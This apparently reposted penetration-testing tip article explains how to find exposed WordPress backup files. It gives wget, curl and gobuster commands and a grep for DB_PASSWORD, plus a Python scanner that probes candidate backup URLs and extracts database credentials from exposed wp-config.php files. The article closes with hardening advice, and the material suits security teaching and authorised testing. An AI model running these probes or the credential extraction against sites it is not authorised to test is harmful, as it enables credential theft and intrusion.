When testing WordPress targets, always check for exposed backup files. Ad-hoc backups and backup plugins often leave them in the web root, where anyone who guesses the filename can download them; a single archive or dump typically contains the database (user password hashes, options, API keys) and `wp-config.php` with the database credentials.
Common Backup Filenames to Look For:
– `backup.zip`
– `wp-backup.sql`
– `database-backup.tar.gz`
– `website_backup.rar`
– `wp-config.bak`
– `backup_wp-content.tgz`
You Should Know:
1. Automated Scanning for Backup Files
Use `wget` or `curl` to request individual backup files:
wget http://target.com/backup.zip
curl -I http://target.com/wp-config.bak
A `200` on a HEAD request is only a hint: many sites answer `200` with an HTML "not found" page for any path, so confirm with the `Content-Type` and `Content-Length` headers or by looking at the first bytes of the body.
2. Directory Brute-Forcing with Gobuster
gobuster dir -u http://target.com -w /path/to/wordlist.txt -x zip,sql,bak,tar.gz
(Common wordlists: `common.txt`, `directory-list-2.3-medium.txt`; `-x` appends each extension to every word, so the list above is effectively `name.ext` for every combination.)
3. Checking File Permissions
On a server you administer (or once you have a shell on the target), use `find` to locate backup files under the web root that are world-readable. The parentheses matter: without them `-o` binds looser than the other tests and the expression silently matches the wrong files, and `-name ".bak"` without the `*` only matches a file literally named `.bak`:
find /var/www/html -type f \( -name "*.bak" -o -name "*.sql" \) -perm -o+r
4. Extracting and Analyzing Backup Files
If you retrieve a backup file, unpack it into a scratch directory and search it for credentials:
unzip backup.zip -d backup_extracted
grep -r "DB_PASSWORD" backup_extracted
For SQL dumps, also look at the `wp_users` table (password hashes) and `wp_options` (site URLs and plugin settings, which frequently hold API keys).
5. WordPress-Specific Commands
Check whether `wp-config.php` is served as plain text instead of being executed. A correctly configured server returns an empty body for the live file, so any hit on these constants means PHP is not being executed for that path; try the same request against editor and copy leftovers such as `wp-config.php~`, `wp-config.php.save` and `wp-config.php.bak`, which the server serves as static files:
curl -s http://target.com/wp-config.php | grep -E "DB_NAME|DB_USER|DB_PASSWORD"
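The enumerate, verify and extract loop of steps 1, 2, 4 and 5, as an added Python example (not code from the original post or from Intigriti). It builds candidate URLs from the name list above the way a `gobuster -x` run would, fetches only the first bytes of each with a `Range` header, classifies hits by magic bytes or content rather than trusting a `200`, and pulls the `DB_*` defines out of exposed `wp-config.php` source. The host `target.example` and the responses in `FAKE_SITE` are constructed so the block runs offline; `http_fetch` is the real network path.

```python
import re
import urllib.error
import urllib.request
from urllib.parse import urljoin

# Candidate names/extensions from the list above, combined the way a
# gobuster -x run would (every name x every extension).
BACKUP_NAMES = ["backup", "wp-backup", "database-backup", "website_backup",
                "wp-config", "backup_wp-content"]
BACKUP_EXTS = ["zip", "sql", "tar.gz", "rar", "bak", "tgz"]

# Magic bytes of the archive formats in the list above.
MAGIC = {
    b"PK\x03\x04": "zip",
    b"\x1f\x8b": "gzip",        # .tar.gz / .tgz
    b"Rar!\x1a\x07": "rar",     # RAR4 and RAR5 share this prefix
}
SQL_DUMP = re.compile(rb"^\s*--\s*(MySQL dump|phpMyAdmin)|CREATE TABLE|INSERT INTO",
                      re.I | re.M)
WP_DEFINE = re.compile(
    rb"define\(\s*['\"](DB_NAME|DB_USER|DB_PASSWORD|DB_HOST)['\"]\s*,\s*['\"]([^'\"]*)['\"]\s*\)")


def candidate_urls(base):
    """Every name.ext combination under base, e.g. http://host/wp-config.bak."""
    return [urljoin(base, f"{name}.{ext}") for name in BACKUP_NAMES for ext in BACKUP_EXTS]


def classify_body(head):
    """Decide what the first bytes of a response are. Returns 'zip', 'gzip',
    'rar', 'sql', 'php-source' or None (None also covers HTML soft-404 pages)."""
    for magic, kind in MAGIC.items():
        if head.startswith(magic):
            return kind
    if SQL_DUMP.search(head):
        return "sql"
    if b"<?php" in head and b"DB_PASSWORD" in head:
        return "php-source"
    return None


def probe(base, fetch):
    """Run every candidate URL through fetch(url) -> (status, content_type, head)
    and keep only responses whose body really is an archive, dump or PHP source."""
    findings = []
    for url in candidate_urls(base):
        status, _content_type, head = fetch(url)
        if status in (200, 206):           # 206 when the server honours Range
            kind = classify_body(head)
            if kind:
                findings.append((url, kind))
    return findings


def extract_db_credentials(php_source):
    """Pull the DB_* constants out of wp-config.php source (bytes)."""
    return {k.decode(): v.decode() for k, v in WP_DEFINE.findall(php_source)}


def http_fetch(url, timeout=5):
    """Real fetcher: asks for the first 4 KiB only, so a multi-GB dump is not
    downloaded just to confirm that it exists."""
    req = urllib.request.Request(url, headers={"Range": "bytes=0-4095",
                                               "User-Agent": "backup-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.headers.get("Content-Type", ""), resp.read(4096)
    except urllib.error.HTTPError as exc:
        return exc.code, "", b""


# Constructed responses for an imaginary host so the example runs offline.
FAKE_SITE = {
    "http://target.example/backup.zip":
        (200, "application/zip", b"PK\x03\x04" + b"\x00" * 60),
    "http://target.example/wp-backup.sql":
        (200, "application/octet-stream", b"-- MySQL dump 10.13\nCREATE TABLE `wp_users` (\n"),
    "http://target.example/wp-config.bak":
        (200, "text/plain", b"<?php\ndefine('DB_NAME', 'wpdb');\n"
                            b"define( 'DB_USER', 'wpuser' );\ndefine('DB_PASSWORD', 'hunter2');\n"),
    # Soft 404: status 200 but an HTML "not found" page; must not be reported.
    "http://target.example/database-backup.tar.gz":
        (200, "text/html", b"<html><body>Page not found</body></html>"),
}


def fake_fetch(url):
    return FAKE_SITE.get(url, (404, "text/html", b"<html>404</html>"))


if __name__ == "__main__":
    for url, kind in probe("http://target.example/", fake_fetch):
        print(f"[+] {url} looks like {kind}")
        if kind == "php-source":
            print("    ", extract_db_credentials(fake_fetch(url)[2]))
    # Against a live, in-scope target: probe("http://target.com/", http_fetch)
```

Swap `fake_fetch` for `http_fetch` to run it against a real host; keep the `Range` header, since a backup that exists is exactly the file you do not want to pull in full during enumeration.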
6. Preventing Exposure on Your Own Server
Keep backups outside the web root and readable only by the account that creates them. The file mode alone is not enough: a `600` file that sits under the document root and is owned by the web-server user is still downloadable by anyone, so the location matters more than the mode:
chmod 600 /var/backups/wp_backup.sql
Also deny backup extensions (`.bak`, `.sql`, `.zip`, `.tar.gz`, `.tgz`, `.rar`, `.old`) at the web-server level and disable directory listings, so a stray copy is not served even if someone drops one into the web root later.
What Undercode Say:
Exposed backup files are a goldmine for attackers. Always secure your backups, restrict directory listings, and monitor file permissions. For penetration testers, automated scanning and manual verification are key to uncovering these hidden vulnerabilities.
Expected Output:
- List of exposed backup files
- Credentials or sensitive data from extracted backups
- Misconfigured file permissions
For a deeper dive, check Intigriti’s full guide:
References:
Reported By: Intigriti Quick – Hackers Feeds